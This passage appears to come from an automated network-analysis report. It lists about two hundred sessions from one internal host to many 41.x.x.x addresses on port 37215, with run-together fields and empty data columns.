                                                                            24387192.168.2.155912641.180.175.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24388192.168.2.154748041.106.11.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24389192.168.2.155161641.224.103.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24390192.168.2.154501241.182.117.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24391192.168.2.153874841.104.36.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24392192.168.2.154530441.120.228.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24393192.168.2.154270641.132.30.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24394192.168.2.155336241.174.221.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24395192.168.2.154274641.37.254.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24396192.168.2.154048641.18.84.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24397192.168.2.154110241.236.221.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24398192.168.2.155337441.148.12.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24399192.168.2.155326241.226.35.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24400192.168.2.154004841.88.130.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24401192.168.2.153351241.166.211.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24402192.168.2.155130041.8.123.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24403192.168.2.155782241.95.244.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24404192.168.2.153468641.63.206.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24405192.168.2.154883041.181.47.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24406192.168.2.153724041.24.61.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24407192.168.2.156010241.217.182.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24408192.168.2.153467441.131.164.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24409192.168.2.153585841.9.53.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24410192.168.2.153509441.182.33.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24411192.168.2.154918841.90.218.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24412192.168.2.155381641.83.31.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24413192.168.2.153509041.99.155.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24414192.168.2.153497441.170.216.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24415192.168.2.155158641.34.95.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24416192.168.2.155844041.251.203.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24417192.168.2.155652841.117.17.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24418192.168.2.154161241.79.255.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24419192.168.2.154294641.251.156.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24420192.168.2.155167641.228.133.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24421192.168.2.153545041.174.24.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24422192.168.2.154364041.26.165.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24423192.168.2.154231041.191.37.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24424192.168.2.153590241.128.202.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24425192.168.2.154478241.57.229.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24426192.168.2.153848041.248.164.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24427192.168.2.155394041.111.255.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24428192.168.2.154316841.1.17.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24429192.168.2.153539041.5.164.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24430192.168.2.155055441.236.147.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24431192.168.2.154062441.149.133.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24432192.168.2.155220241.171.38.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24433192.168.2.155988241.91.215.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24434192.168.2.154429841.228.218.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24435192.168.2.155240441.197.66.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24436192.168.2.155019841.129.37.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24437192.168.2.153599641.250.5.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24438192.168.2.155310241.9.49.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24439192.168.2.155554641.35.42.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24440192.168.2.155785441.204.26.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24441192.168.2.155295441.87.192.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24442192.168.2.155634041.88.3.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24443192.168.2.153511441.97.28.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24444192.168.2.155598241.77.160.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24445192.168.2.154833441.97.14.18837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24446192.168.2.153795241.243.196.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24447192.168.2.153861641.17.5.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24448192.168.2.155434241.94.99.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24449192.168.2.153479041.33.123.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24450192.168.2.155921441.110.22.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24451192.168.2.153858441.115.55.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24452192.168.2.153985041.170.210.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24453192.168.2.155023641.66.221.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24454192.168.2.153556441.28.70.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24455192.168.2.155046841.69.138.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24456192.168.2.155660841.59.73.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24457192.168.2.153836041.190.57.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24458192.168.2.153279841.2.166.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24459192.168.2.154443041.108.195.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24460192.168.2.155641641.113.187.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24461192.168.2.154919041.204.3.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24462192.168.2.153388241.153.253.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24463192.168.2.155854441.38.36.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24464192.168.2.155762241.197.132.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24465192.168.2.154646241.3.233.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24466192.168.2.155176441.63.103.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24467192.168.2.154187641.205.216.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24468192.168.2.156073041.122.32.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24469192.168.2.154163241.73.231.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24470192.168.2.154892241.80.193.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24471192.168.2.154707641.147.239.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24472192.168.2.154863441.67.249.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24473192.168.2.153551241.122.138.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24474192.168.2.154043441.117.197.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24475192.168.2.154564241.232.112.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24476192.168.2.154317241.16.75.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24477192.168.2.155450241.220.240.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24478192.168.2.154725241.197.226.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24479192.168.2.153589241.35.69.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24480192.168.2.154518641.224.161.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24481192.168.2.155250041.103.150.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24482192.168.2.154184641.206.113.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24483192.168.2.155618441.68.100.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24484192.168.2.154607241.218.187.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24485192.168.2.154466441.134.167.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24486192.168.2.155117441.235.16.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24487192.168.2.155631041.33.51.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24488192.168.2.155710041.164.228.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24489192.168.2.154866841.123.197.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24490192.168.2.155027641.107.68.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24491192.168.2.154290841.3.84.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24492192.168.2.154419241.117.231.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24493192.168.2.154883241.167.220.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24494192.168.2.155120641.140.136.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24495192.168.2.154635241.153.184.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24496192.168.2.155275641.176.200.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24497192.168.2.153614041.34.128.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24498192.168.2.154310041.219.193.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24499192.168.2.155461041.227.167.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24500192.168.2.153699441.130.0.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24501192.168.2.154760641.93.252.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24502192.168.2.155044241.178.26.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24503192.168.2.154804641.81.132.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24504192.168.2.155146441.20.239.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24505192.168.2.153468441.194.230.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24506192.168.2.155415641.102.117.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24507192.168.2.153863641.176.4.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24508192.168.2.153629641.219.192.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24509192.168.2.155223641.240.20.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24510192.168.2.155434441.111.5.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24511192.168.2.154701441.152.232.19337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24512192.168.2.154368441.49.180.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24513192.168.2.154909841.100.19.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24514192.168.2.153873241.36.52.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24515192.168.2.154953241.228.197.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24516192.168.2.154935641.108.182.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24517192.168.2.155717441.76.15.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24518192.168.2.154544441.104.17.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24519192.168.2.155084041.85.164.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24520192.168.2.155728641.191.221.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24521192.168.2.154510841.247.22.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24522192.168.2.155152641.90.34.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24523192.168.2.155332441.156.29.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24524192.168.2.155588041.38.254.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24525192.168.2.154031041.230.86.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24526192.168.2.155206641.8.74.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24527192.168.2.155977841.46.40.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24528192.168.2.155509241.202.191.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24529192.168.2.155472641.88.39.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24530192.168.2.155138641.77.209.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24531192.168.2.155842241.16.170.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24532192.168.2.155790841.27.214.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24533192.168.2.155187041.169.90.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24534192.168.2.155695441.5.12.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24535192.168.2.154743841.75.188.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24536192.168.2.155870641.162.154.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24537192.168.2.153599641.98.234.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24538192.168.2.156079641.172.149.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24539192.168.2.155260041.80.128.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24540192.168.2.155148441.104.51.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24541192.168.2.155610041.178.151.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24542192.168.2.154931441.212.123.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24543192.168.2.155170841.199.254.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24544192.168.2.155322641.140.42.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24545192.168.2.154830841.85.88.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24546192.168.2.154942641.172.242.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24547192.168.2.155583041.192.121.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24548192.168.2.155705241.149.182.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24549192.168.2.154001841.236.167.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24550192.168.2.154522641.159.255.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24551192.168.2.154760841.11.5.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24552192.168.2.155968241.96.51.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24553192.168.2.154573441.128.84.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24554192.168.2.154327041.182.228.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24555192.168.2.154708841.8.80.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24556192.168.2.155953641.154.152.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24557192.168.2.154052841.73.176.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24558192.168.2.154162641.160.189.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24559192.168.2.154577641.198.84.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24560192.168.2.155077841.112.249.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24561192.168.2.155138441.135.126.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24562192.168.2.153500041.236.214.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24563192.168.2.156090641.212.164.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24564192.168.2.156039241.40.8.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24565192.168.2.155513241.124.122.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24566192.168.2.154936241.147.241.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24567192.168.2.153341641.185.205.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24568192.168.2.154835041.26.14.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24569192.168.2.156074241.222.138.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24570192.168.2.154056841.130.24.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24571192.168.2.154558241.165.142.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24572192.168.2.155744441.93.34.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24573192.168.2.155933441.66.249.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24574192.168.2.156085641.139.129.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24575192.168.2.155825641.137.140.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24576192.168.2.155546641.168.147.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24577192.168.2.153626441.46.125.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24578192.168.2.154733441.161.243.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24579192.168.2.153646841.187.183.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24580192.168.2.153377041.100.201.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24581192.168.2.155949041.217.89.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24582192.168.2.154864641.208.163.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24583192.168.2.154030641.204.118.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24584192.168.2.154354641.251.66.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24585192.168.2.153681041.155.106.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24586192.168.2.155903041.200.194.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24587192.168.2.155100641.45.51.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24588192.168.2.155849441.47.191.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24589192.168.2.154998441.247.192.25037215
                                                                            TimestampBytes transferredDirectionData


